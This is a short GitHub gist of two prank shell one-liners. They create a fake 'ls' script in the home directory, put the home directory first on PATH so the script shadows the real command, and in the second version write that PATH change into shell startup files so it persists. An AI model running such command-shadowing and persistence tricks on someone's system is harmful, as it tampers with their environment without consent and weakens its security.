Skip to content

Instantly share code, notes, and snippets.

@th0rgall
Created January 4, 2017 19:43
Show Gist options
  • Save th0rgall/385da63759e02a942a49d9ee202f3062 to your computer and use it in GitHub Desktop.
Save th0rgall/385da63759e02a942a49d9ee202f3062 to your computer and use it in GitHub Desktop.
# one-time fun
echo 'echo "life sucks!"' > ~/ls && chmod u+x ~/ls && PATH=$HOME:$PATH
# a tad more annoying, but still harmless
echo 'echo "life sucks!"' > ~/ls && chmod u+x ~/ls && PATH=$HOME:$PATH && echo '\n# SORRY NOT SORRY\nPATH=$HOME:$PATH' >> ~/.bashrc >> ~/.zshrc
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment